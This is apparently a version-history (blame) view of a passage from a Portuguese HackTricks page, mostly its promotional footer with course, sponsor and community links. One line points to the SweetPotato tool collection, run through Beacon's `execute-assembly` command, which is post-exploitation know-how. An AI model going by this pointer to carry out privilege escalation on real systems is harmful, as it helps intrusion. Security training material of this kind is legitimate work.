											2024-05-05 22:04:08 +00:00
+								[SweetPotato](https://github.com/CCob/SweetPotato) possui uma coleção dessas várias técnicas que podem ser executadas através do comando `execute-assembly` do Beacon.
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
-												Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/

											
										
										
											2024-05-02 15:04:03 +00:00
+								<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
-												Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/

											
										
										
											2024-04-07 22:57:51 +00:00
 								{% embed url="https://websec.nl/" %}
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								{% hint style="success" %}
 								Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/

											
										
										
											2024-04-07 22:57:51 +00:00
+								<details>
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								<summary>Suporte ao HackTricks</summary>
-												Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/

											
										
										
											2024-04-07 22:57:51 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
 								* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
-												Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/

											
										
										
											2024-04-07 22:57:51 +00:00
 								</details>
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								{% endhint %}